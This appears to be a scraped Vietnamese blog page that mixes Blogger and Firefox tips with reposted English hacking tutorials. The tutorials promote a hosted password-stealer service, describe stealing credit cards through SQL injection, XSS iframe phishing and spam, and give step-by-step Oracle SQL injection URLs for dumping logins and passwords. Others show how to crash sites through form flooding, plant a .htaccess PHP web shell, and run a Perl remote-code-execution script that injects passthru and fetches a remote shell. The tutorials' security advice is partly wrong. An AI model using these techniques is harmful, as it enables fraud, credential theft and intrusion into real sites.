Đang tải dữ liệu...
Hiển thị các bài đăng có nhãn Coding. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Coding. Hiển thị tất cả bài đăng
22:08

Thanh cuộn vô hạn từ Jquery cho Blogger

Thanh cuộn vô hạn (Infinite Scrolling) đề cập đến khả năng tiếp tục tải các nội dung mới trên trang web mà không phải làm mới nó sự xuất hiện của các bài viết là vô tận khi bạn kéo thanh cuộn xuống phía dưới chân blog. Tiện ích này được sử dụng nhiều trong các trang web lớn như Google, Facebook và Twitter và khá thành công tại đó. Lợi ích lớn nhất là tiếp xúc với nhiều nội dung và duyệt web nhanh hơn. Namkna sẽ hướng dẫn ccs bạn làm thế nào để tích hợp nó vào blog Blogger của bạn bằng cách sử dụng Ajax Infinite Scroll jQuery plugin.

Demo

» Tính năng
1. Tải nhanh hơn
2. Hiển thị nội dung tăng lên nhiều lần so với dạng truyền thống,
3. Trực quan hơn với độc giả xem bằng các thiết bị cảm ứng.
4. Thích hợp nhất cho blog sử dụng nhiều hình ảnh nặng
5. Danh mục chính được đơn giản hóa
6. Cam kết sử dụng cao hơn

» Thêm Infinite Scrolling với JQuery vào blog.

1. Đăng nhập vào blog.
2. Vào bố cục.
3. Chọn Thêm tiện ích => Tạo một tiện ích HTML/Javarscipts và chọn một trong 2 code bên dưới dán vào:
¤ Style 1: Hiển thị trên trang chủ, trang nhãn, trang lưu trữ và cả trang bài viết (các bài trước nó sẽ được nạp đầy đủ);


¤ Style 2: Chỉ Trang chủ, trang nhãn và lưu trữ trang  (Nó sẽ không làm việc trong các trang viết ).


» Một số lời khuyên và mẹo nhỏ!

- Nút +1, Tweet và nút Like sẽ được nạp sau khi tất cả các yêu cầu AJAX tải xong, vì vậy nếu blog của bạn có các nút chia sẻ xã hội bên dưới mỗi bài viết thì không cần phải lo lắng về chúng không hiển thị.

- Khi bài viết mới được tải dưới một bài (Nếu bạn chọn style 1), thì Threaded trong bài viết vừa được nạp sẽ không làm việc

- Để thay thế hình ảnh tải, chỉ cần tìm kiếm ảnh có đuôi .Gif trong mã và thay thế thành URL hình ảnh khác

Để thay đổi số lần tải trước khi người dùng được yêu cầu tải trang nhiều hơn, tìm kiếmtriggerPageThreshold:8 và thay thế các số ở phía trước, nếu như bạn thiết lập giá trị là 4thì plugin sẽ tải các nội dung mới bốn lần trước khi nó yêu cầu bạn xem bạn muốn xem nội dung nhiều hơn hay không

onRenderComplete:function() chức năng được sử dụng để nói với các plugin phải làm gì sau khi trang đã được nạp thành công, Ở đây namkna đã thêm một đoạn mã để nói với Google Analytics là một trang mới được tải để GA sẽ ghi nhận mọi yêu cầu AJAX như một trang mới thăm

loaderDelay:600 là thời gian chờ đợi trước khi nội dung mới được tải thêm (đoan vị tính là phần nghìn giây).

- Để biết thông tin về tất cả các tùy chọn có sẵn trong plugin này hãy xem tại đây IAS Options

18:17

Fake trình duyệt trên wall facebook (+Cách vào facebook 2013)

Online Facebook thấy bạn bè post status thông qua những "thứ" rất lạ mà bạn không biết làm như nào
Đinh Công Thành Blog sẽ hướng dẫn bạn làm được như vậy và có thể còn hơn nữa :3

Các bạn chỉ cần đăng nhập Facebook và chọn 1 trong số những dòng dưới đây để check in Facebook của mình



Để hiện ra link bạn vui lòng chờ 5 giây và bấm vào BỎ QUA QUẢNG CÁO
Cám ơn bạn đã ủng hộ
(Click vào link để post on wall )


Update ...!
* Nguồn : DinhCongThanh.Com *
Lưu ý : Các bạn nào không vào được facebook thì có thể dùng trình duyệt corom ++ để vào hoặc có thể là dùng HOST
Bước 1 - Mở Notepad: Click vào Start Menu > All Programs > Accessories > Notepad. Nếu bạn dùng Windows Vista hoặc Windows 7, thay vì click vào biểu tượng Notepad, bạn click chuột phải vào biểu tượng Notepad, trên menu hiện ra, chọn "Run as Administrator".
Bước 2 - Mở file hosts: Trong Notepad bạn vào menu File > Open. Ở phần Filter gần ô File name, bạn chọn All Files (*.*). Sau đó vào đường dẫn:C\Windows\System32\drivers\etc để mở file có tên là hosts.
Bước 3 - Sửa file hosts: Sau khi đã mở file hosts, di chuyển con trỏ đến cuối file. Rồi bấm Enter. Copy toàn bộ nội dung tương ứng như sau để thêm vào cuối file hosts:

Bước 4 - Bấm Save và tắt Notepad
Bước 5 - Tắt trình duyệt bạn đang dùng và vào lại trang facebook.com để kiểm tra kết quả
Chúc các bạn thành công và hãy chia sẻ với bạn bè của mình nhé!

Cách 4: Thay đổi DNS để vào Facebook

Bạn có thể thay đổi DNS để "nói" với máy tính rằng hãy tìm địa chỉ IP thực của Facebook bằng 1 máy chủ khác. Một số địa chỉ DNS server uy tín mà bạn có thể sử dụng:
Open DNS: 208.67.222.222 và 208.67.220.220
Google DNS: 8.8.8.8 và 8.8.4.4
Các bước để thay đổi DNS như sau:
Bước 1:
Đối với Windows XP, Windows Vista: Vào Start Menu > Control Panel > Network Connections, sau đó chọn Properties trên cửa sổ. Cách khác nhanh hơn là bạn bấm phải chuột vào biểu tượng nhấp nháy màu xanh, hình mạng máy tính ở góc dưới cùng bên tay phải của màn hình, sau đó chọnProperties.
Đối với Windows 7 (Win7): Bấm vào biểu tượng chiếc máy tính ở icon tray phía dưới bên phải màn hình. Bấm vào Open Network and Sharing Center. Trên màn hình hiện ra, chọn Change adapter settings. Sau đó bấm đúp chuột vào biểu tượng nào có hình kết nối màu xanh, rồi chọnProperties.
Bước 2: Trên màn hình Properties, chọn Internet Protocol Version 4 (TCP/IP v4), sau đó bấm tiếp vào Properties. Trên màn hình hiện ra bạn bấm vào Use the following DNS server addresses: sau đó điền giá trị của DNS server ở trên vào ô Prefered DNS Server và Alternate DNS Server.
+ Prefered DNS Server: 208.67.222.222 (hoặc 8.8.8.8 nếu bạn muốn dùng Google DNS)
+ Alternate DNS Server: 208.67.220.220 (hoặc 8.8.4.4 nếu bạn muốn dùng Google DNS)
Sau đó bấm OK để cập nhật DNS mới.
Hình minh họa cách đổi DNS để vào facebook ở dưới đây:
Hướng dẫn cách vào Facebook bị chặn mạng VNPT, FPT, Viettel
Bước 3: Bạn đóng trình duyệt Internet Explorer, FireFox hoặc Google Chrome đang sử dụng. Sau đó mở lại và vào lại http://www.facebook.com


22:56

[TUT]FB, GMAIL, etc Remote Password Stealer for Windows Vista/7 - Java Applet

Steps:
1. Go to: http://stealer.ambesty.com/

2. Read the instructions
3. Enter your email, click Signup/Login.
4. It will generate a URL per theme, send your slave the URL.
5. If all goes well, you should receive an email in your inbox with the decrypted data.

Optional:
Use domain services such as :  http://dot.tk

to encode the URL's into more believable ones.

Right now only 2 themes exist. A blank one and a hello kitty one (for girls who love cute things). To create your own theme, read the instructions.

Please submit feedback and additions you would like to see for future versions. It is in Beta right now so bugs may occur.

22:48

Getting Private CCs using SQL Inject., XSS Iframe inject., and phishing!

Hey all, this is my very first tutorial, so bear with me and please REP and THANK if you enjoy and/or if it helps ypu.

This is my method for getting fresh CC info, sent directly to an inbox of your choosing!

First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities, and XSS vulnerabilities.

First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customer's e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.

Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.

You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.



Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved. 


Search for "action=", and change the page following it to your third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....



You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.

After putting all this together and uploading it to a host, you'll want to shorten youre redirect.html URL, you can use bit.ly, or another shortening service. Then, you can send an e-mail to all the customers e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.

A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is targethero.com

They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use receive-sms-online.com or freesmsreceive.com/index.php where you can get SMS sent to you with no registration.

Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!

Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up. Enjoy!!!
14:59

Giao diện Metro UI trên Mozilla Firefox


Giao diện UI trên Firefox
Hôm nay, trong bài viết này, tôi sẽ giới thiệu với bạn một theme style Windows 8 UI trên Firefox rất tuyệt.
Nếu bạn quan tâm hãy bắt đầu thực hiện theo những bước sau :


Bước 1 : Download gói cài đặt tại link dưới :


- Bước 2: Giải nén
Bước 3: Tại Folder vừa giải nén, bạn sẽ thấy những gói cài đặt nhiều ngôn ngữ khác nhau. Hãy chọn và mở folder EN. Sau đó chọn toàn bộ (file và folder) trong đó và Copy.

Bước 4 : Mở RUN  (Nhấn tổ hợp phím Windows + R) nhập vào :
%AppData%\Mozilla\Firefox\Profiles\
Mở thư mục xxxxxxxx.default trong Profiles và Paste toàn bộ gói dữ liệu trong folder EN ở trên vào.

- Bước 5 : Mở thử Firefox để xem kết quả.

Lưu Ý : Firefox của bạn phải là phiên bản mặc định là tiếng anh nhé :v
Nguồn :  Erhay.com.

23:23

Oracle SQL Injection Tutorial

logo_oracle
Oracle SQL Injection Tutorial.
Hello and welcome to a Oracle SQL injection tutorial. First you need to know that injecting into to Oracle databases is not much different then injecting into others. The only differences are the syntax and different filenames etc... Ok, if you know a site the is vulnerable to some sort of SQLi but, you don't know what database it is, try the following code to check for a Oracle DB.

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL%
20from%20dual--

If it is a Oracle DB you should get a error like:

Code:

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns

Now to find the amount of columns in the DB you will keep adding NULL data until you no longer receive and error.

Code:

https://somesite.com/calender.asp?day=7%...NULL,NULL%
20from%20dual--

Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well.

Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is:

Code:

https://somesite.com/calender.asp?day=7%...,'a',NULL%
20from%20dual--

Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
object_name,object_type,NULL%20from%20user_objects--

As you can see, we use the columns that use string data to show object_name and object_type.


Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not owned it.

We should now see many different table names and types. If you don't, and you get and error, try removing NULL values and finding the columns that use string data type.

In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%
3d%20Â’USERSÂ’--

Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar).

Now lets say we get login, password, and priviledge columns. We can query these by using the following code:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login,password,priviledge%20from%20users--

You should get the login username, password, and priviledge level!

Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login||Â’:Â’||password||Â’:Â’||priviledge,NULL,NULL%20from%20user_objects--

This is just like the concat command in MySQL.

Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB.


Follow: http://hackthedevil.blogspot.com/2013/06/oracle-sql-injection-tutorial.html
23:20

Crash a small website with Firebug

xzibit-meme-generator-yo-dawg-i-heard-u-like-spam-c3ebc7

1. You will need to download Firefox or Opera (of you choose Opera skip to number 5)

2. Open up Firefox, and go to the tool bar.. open Tools>Addons, and then go to get addons, and search: Firebug.

3. Install Firebug, and then restart Firefox.

4. Firebug should be at the bottom right corner of your browser. Now just go to the small blog and/or website of your choice.

5. Post a blog... but not just any blog.. the crash blog! What you're going to do, is... right click on the submit button, and scroll down to inspect element (click it), then you are going to find the element that says maxchar and change it, and the value to whatever the hell you want! My suggestion is that you hold down the 9 button for like 10 minutes.

6. once the maxchar has been changed... find as many of the biggest web pages on the internet, select all copy and paste them into your blog, over and over and over again.. my suggestion is that you wikipedia search cheese, and copy and paste that over and over.

7. Submit, and watch the website crash!
23:15

How to hide your shell using .htaccess

htaccesssw

Today I want to show you a less known trick in which you can use .htaccess file. Already available on server as a shell to execute OS commands, so just follow the simple steps described below. This file is also useful to add restrictions on files.

Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.


After clicking on the edit option, add the following lines of code in your .htaccess file.

Code:

Quote:<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>



After adding your codes, save it, and done ! 

But sometimes we can't able to edit .htaccess file due to permissions provided by the administrator so we must have to change the permissions

If we get an error: .htaccess is not readable
Then use following command to change it to the readable, writable and also in executable mode.. 
command: chmod 777 .htaccess

Here in above command we can see 777, The fist digit (7) is for user,
second(7) for group and third (7) is for others..!! In UNIX/Linux permissions are divided into 3 categories User-Group-Others 

Now in order to use your .htaccess shell

http://www.your-hacked-website.com/.htaccess?cmd=ls

After ?cmd= you can execute any OS command of your choice.
23:13

Remote code injection

PHP-5-3-10-Released-to-Fix-Remote-Code-Execution-Flaw

x41 - Intro
x42 - Basics Of Remote Code Execution And How It Develops
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
x44 - Prevention And Filtration
x45 - Conclusion

========================================================
x41 - Intro
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The B@sIc::
InTr0:

Remote Code Execution Is Yet Another Common Vulnerability
existing is wide range of web apps in the current era.It allows a remote
attacker to execute arbitrary code in the sytem
with administrator privelages without the attention of
the owner of the targetted site.It's just not a-hole-to-avoid, but an
extremely risky vulnerability,which can endanger your site to different attacks,
malicious deletion of data,even worst Defacing!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

x42 - Basics Of Remote Code Execution And How It Develops
============================================================

Basic Remote Code Executions:

Now I will highlight some basics remote code executions
being planted that exist still in this era of web app development.


We will now examine a comment form getting comments from a user("submit.php") and posting it at "comments.php"


We Are analyzing submit.php with simple post method that submits the gathered user input and forward the request to
comments.php.


/*

submit.php::

<form method="POST" action="">
<textarea rows="10" name="comments" cols="60"></textarea>
<p><input type="submit" value="Post" name="sub"></p>
</form>

==========================================================

comments.php::

<?php

$comments = $_POST['comments'];
$log = fopen('comments.php','a');
fwrite($log,'<br />'.'<br />.'<center>'.'Comments::'.'<br />'.$comments);
fclose($log);

?>

*/


Now by just looking at it, we could very easily proove it as insane! How?? Well,as we can see there is a form that submits
a user inputted(what-so-ever) comments to comments.php including malicious which writes the comments exactly as user's input 
witout being sanitized.This means that an attacker here is getting full advantage to exploit the vulnerable comments 
submission form by executing some malicious request, which could be just to gather server details like using phpinfo()
which is an exceptional case for attackers these days,or even more pathetic could be getting a shell on a vulnerable server.


We will take another example using GET request to display error message and log the ip with the specific message.
(it's a common vulnerability planted by the coder while developing a website for an organization,etc).'x'.





/*

info.php::

<?php
$msg = $_GET['msg'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('errorlog.php','a');
fwrite($error,'<br />'.$msg.'<br />'.$ip.'<br />');
fclose($error);
?>

*/


This piece not only effect and vulnerable to remote code execution but also to several other attacks including
xss,javascript injection,vbscript injection etc.

This will too allow a remote attacker to posion the log file and inject malicious code to the logs.
================================================================================​============================

Now I will highlight another type of remote code execution can also be defined as posioning the cookies 


/*
<?php
require("config.php");
if(!isset($_COOKIE['admin']))
{
header("Location:admin.php?user=admin");
}
?>
*/

Now we see the code is really pissed! In simple terms, its trying to say if the cookies of the system matches "admin"
then it verifies a user as the administrator.This is totally bad!

We will look upon another example like this which uses GET request to verify a user status::

/*
$admin = $_GET['admin'];
if(!isset($admin == 1)){
$queryxyz = "SELECT * from user where username='$admin'";
header("Location:admin/admin.php");
}
*/

It can be just more complicated than that, like most possibly there can be usage of sessions to verify admin if the
variable "admin" would match "1", how ever this is just an sql query used to select administrator as the user when
admin = 1 The query is giving possibly another vulnerability Yeah, right "Sql INJection!";
================================================================================​=================================

Remote Code Execution is also possible through headers deposition or an arbitrary file upload if theres a file processing
system and is not sanitized.

================================================================================​=================================



================================================================================​=========================
x43 - Exactly How An Attacker Get Advantage Over This Vulnerability And Misuse It!
================================================================================​=========================

I will highlight exactly how an attacker manage to do this

Likely supposing an attacker finding a vulnerable target and he got hold of the news that a GET variable have been
implemented here in order to log a particular data to some specific file lets say 'x'. The attacker will struggle to their
best to get hold of the file where the data is being wrote, path arrays are used by the attacker for successfull exploitation
and then of course the attacker will likely inject some malicious
string in order to check if it's filtering the output, in this case no it's not doing any checkup or using htmlentities or 
htmlspecialchars() funcs.So the attacker will likely get a hell lot of benefit from this.Most probably he will try to spawn
a shell on the targetted server to gain full advantages of his or her blackhat stuff 
Supposing an attack on the victim host

http://victim.xxx/info.php?msg=<? passthru($_GET['attacker']); ?>

This will posion the log file and inject a vulnerable piece of code which can be later exploited and
treated as a Remote File Inclusion(RFI) Vulnerability
to get a shell on the victim server and show his/her dirty works..

Probably, ||http://victim.xxx/errorlog.php?attacker=Sh3ll?||

This will do the work! 


In some other cases like the one "if(!isset($admin == 1)" it could be also exploited with great ease, the attacker just
have to spoof the variable from the server request and that's not at all difficult being a GET variable 

http://victim.xxx/file.php?admin=1

This will do it 

and for the cookies thingy it's same... just need to edit cookies and you are the master!

Supposingly the below pattern::

if(!isset($_COOKIE['administrator'])){
//Some Authencation Headers Below
...
}

In this type of pattern, you just change the cookies to administrator and tada you are in as admin!


It's better to handle the case with care.I will now write a little POC(Proof-Of-Concept) in order to explain
and exploit the target remotely and quite easily! It's not good but important to use such kind of script
to expoit the issue and execute the command successfully,since the browser will surely encode your tags, making
the request not at all efficient and successful!

The below script would bypass this, and fulfill it's purpose at all cost 

================================================================================​=================

POC::
/*
#!/usr/bin/perl
#Php Endangers - Remote Code Execution
#POC To inject and execute a malicious request, probably spawning and executing a shell command

use LWP::Simple;
use LWP::UserAgent;

sub header()
{

print q{
-----------------------------------------------------------------------------------------
Usage <target> <vulnerable file> <variable> <log file> <shell> <command>
Example roc.pl http://127.0.0.1 info.php msg errorlog.php http://127.0.0.1/r57.txt ls -la
------------------------------------------------------------------------------------------
}
}

$inject = "<?php if(get_magic_quotes_gpc()){ /$_GET[cmd]=stripslashes(/$_GET[cmd])/;} passthru(/$_GET[cmd])/; ?>";

#You may notice some additional funcs used to inject, these are to execute and produce 99% successful result
#it would help and bypass magic_quotes func and stripslashes too, that would possibly of lot good to the attacker!

if(@ARGV !=5){
header();
}

$target = @ARGV[0];
$file = @ARGV[1];
$var = @ARGV[2];
$log = @ARGV[3];
$shell = @ARGV[4];
$command = @ARGV[5];



$agent = LWP::UserAgent->new();
$exec = "http://$target/$file?$var=$inject";
$agent->get("$exec");
$exec2 = "http://$target/$log?attacker=$shell&$cmd=$command?";
$agent->get("$exec2")
or die"Host Seems Down";
print "Injected Successfully!!";

print "Check The Shell Manually At"." "."http://$target/$log?attacker=$shell&$cmd=$command?";

#REMOTE CODE EXECUTION
#An explanation POC for exploiting the roc(Remote CODE Execution) Vulnerability.
*/


================================================================================​===============================
Null Bytes Injection::

In A Piece Of Code Like One Mentioned Below, It Would Be A Wonder To An Attacker How To Eliminate The Compulsory
File Extension And Exploit The Vulnerability Or Use The Inclusion To Execute A Shell Upon The Tagetted Server.


<?php
$file = $_GET['file'];
include('$file.php');
?>

Now we can clearly declare the above code as a critical vulnerability, helping attacker to do a lfi or rfi depending
on the attacker's strategy.But it's clear that the inclusion would be failed because of the extension increment issue.

Now the attacker would surely like this at all, and will try to elminate the extension by using NULL BYTES Or Posioning
null bytes in to the server.

Below is an example what exactly happens when a inclusion is performed in such case::

http://victim.xxx/include.php?file=http:...sh3ll.txt?

since the code is adding extensions after $file variable means it would be adding .php after .txt, thus making
the exploitation dumb,in simple it would make the request looks like::

http://victim.xxx/include.php?file=http:...l.txt.php?

Where such case dont exist!

Now the attacker will eliminate the extension to successfully exploit the issue by posioning null bytes in the request
made,below is how the attacker will manage to do so::

http://victim.xxx/include.php?file=http:...3ll.txt

This would make the request eliminate the additional extension, and would successfully exploit the issue!



================================================================================​=====================
x44 - Prevention And Filtration

================================================================================​=====================
Prevention::

It's better to design what-so-ever form in such a way that it sanitizes and filters a user input before
writing or actually executing the request on the server. This can be done easily with the ease of php
built in htmlentities(); htmlspecialchars(); and most importantly strip_tags and stripslashes functions. 
This Will abort a malicious request and will execute the request after the malicious tags had been aborted.
For instance an attacker trying to inject a piece of code 'y' to a GET variable....

http://victim.xxx/file.php?var=<? phpinfo(); ?>

now if the file is under htmlentities,htmlspecialchars,strip_tags or stripslashes() protection, then this will make the 
request of the attacker totally dumb and of course of no use!

Supposingly a simple filtration pattern:

/*
<?php
$data = stripslashes($_GET['data']);
$fh = fopen('file.php','a');
fwrite($fh,$data);
fclose($fh);
?>
*/

This will abort the tags "<?", "?>","()" and ofcourse will make the rest of the piece of code of no use since
"phpinfo" is not insane or looks malicious the server will only write that in exact ascii form to the file.

There are even better cures by using magicquotes on, how ever it can cause some other complicated problems if not used properly, 
so it's not recommended to beginners until they know what they are doing.

================================================================================​===========================================
x45 - Conclusion
================================================================================​===========================================

Conclusion::

I have used several examples to explain the basics of remote code execution and exactly how it's planted in web apps.
I have tried my level best to explain the terms and consequences in simple and easy words including all piece of codes
mentioned here.However I don't hold any responsibility of any misuse or dirtyworks performed by gaining the knowledge
within the paper.Beside this, I strongly recommend all to go through it, it's simple and easy and will awoke the dangers
that can be encountered by little careless mistakes!

Like Me On Facebook

Bài Đăng Mới

Quảng Cáo